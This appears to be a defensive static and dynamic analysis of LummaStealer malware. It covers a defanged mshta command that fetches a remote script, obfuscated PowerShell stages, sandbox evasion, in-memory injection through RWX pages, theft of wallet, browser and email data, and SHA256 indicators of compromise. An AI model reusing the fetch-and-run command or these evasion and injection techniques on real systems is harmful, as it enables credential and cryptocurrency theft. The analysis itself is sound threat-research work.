LummaStealer Malware Static and Dynamic Analysis

Analysis Summary

A .NET InfoStealer malware infecting windows devices through malicious advertising that could be navigated by the user that led him to download malicious executable file to drop and execute stealer malware using multi stages of malicious powershell scripts.

Static Analysis

A command has been executed on the target that dropped another WSH script.

"mshta.exe" hxxps[:]//macphotoeditor[.]shop/singl6[.]mp4


The obfuscated WSH script executed and dropped another stage of obfuscated powershell script. 2.png

The third stage of powershell script is executed with -w 1 argument to minimize and hide powershell window prompt from the user and executes obfuscated function. 3.png

After de-obfuscating the third stage of powershell malware script using “PSDecode” module the script is now more readable and using sandbox evasion techniques by checking if analysis tools processes is running and checking most common usernames used in known sandboxes.

After that, The script will drop and execute fourth stage of malware



The fourth stage of malware “singl6.vsdx” is another highly obfuscated powershell script with 10.18MB in size file. 5.png

Deobfuscating this type of huge powershell script is a bit tricky so we will do it in the following steps:

  • STEP 1: Will take a copy of the file with .ps1 extension for text highlighting.
  • STEP 2: At the end of the script will see a function that decrypts and executes the obfuscated data. 6.png

There’s a function called fdsjnh() that tries to decrypt a specific data stored in variable above using XOR key and then decodes it using FromBase64String() functionality to base64 decode it. Then, It takes the decrypted data and tries to execute it in memory. So if we tried to print the decrypted data when it returns from the function without executing the actual decrypted code we will be able to retrieve the plain text readable code after it gets decrypted. 7.png

Now it’s more obvious. It defines a variables that will be used to allocate and RWX (Read_Write_Executable) memory page that will be used later to store another decrypted malicious code and injects it into the memory in order to executes it. 8.png

As below, It’s using multiple windows API calls from kernel32.dll for creating RWX memory section. VirtualProtect(), GetCurrentProcess(), VirtualQuery(), ReadProcessMemory(), WriteProcessMemory() etc. 9.png

It will tries to loop through the allocated memory section in order to write the decrypted malware into it. 10.png

The actual encrypted malware is stored in $a variable that will be load and executes later. 11.png

After that it will loads the assembly of the decoded code and executes it. 12.png

In order to retrieve the encoded file, Will take the encoded base64 string stored in the $a variable and write it to a file. As it appears in the below image, It has MZ magic bytes which is a portable executable file. 13.png

Another .NET stage of the malware that’s packed with .NET Reactor and Cryptor packers. 14.png

Sample has been submitted to VirusTotal. 15.png

Dynamic Analysis

After doing static analysis against the decoded malware using sysinternal tools and network analysis, We will try now to see the behavior of this infostealer when it gets executed on the system.

It tries to access multiple softwares sensitive files like Telegram, FileZilla, AnyDesk, NordVPN, etc. 15.png

Stealing emails senstive data (PMail, eM, Mailbird, Outlook, etc.) 16.png

Stealing crypto wallets (Etherum, Exodus, Binance, Electrum). 17.png

And of course browsers data (Chrome, Edge, Firefox, AVG, Tencent, 360Browser, CentBrowser, Chedot, etc.) 18.png

After completing its process, It uploads the collected data to their C2 domain URL and then exists.



Indicator of Compromise (IOCs)

FileName SHA256 Hash
1.exe ca00dbff57cdc83f39a213ea96726063f18aa14f9a0ae2f52c2c6d54f23dcd00
singl6.mp4 d070fad55be0d3269dbebb1de70652d82d48f0ad849f960d27d3e71018eb208c
singl6.vsdx 4dff60f8e1dd41b557f47204c6f1f6d75a77efbd0fba0a01484ec3f328211cb0
stage3.ps1 30a491d49ee9675a5114803e67c801335b893a56e42f7066be6deffdd6928632
stage5.ps1 b20da13c9fdd9a5984210edefda303d0c4db5adbb38aee82a525dec42818da91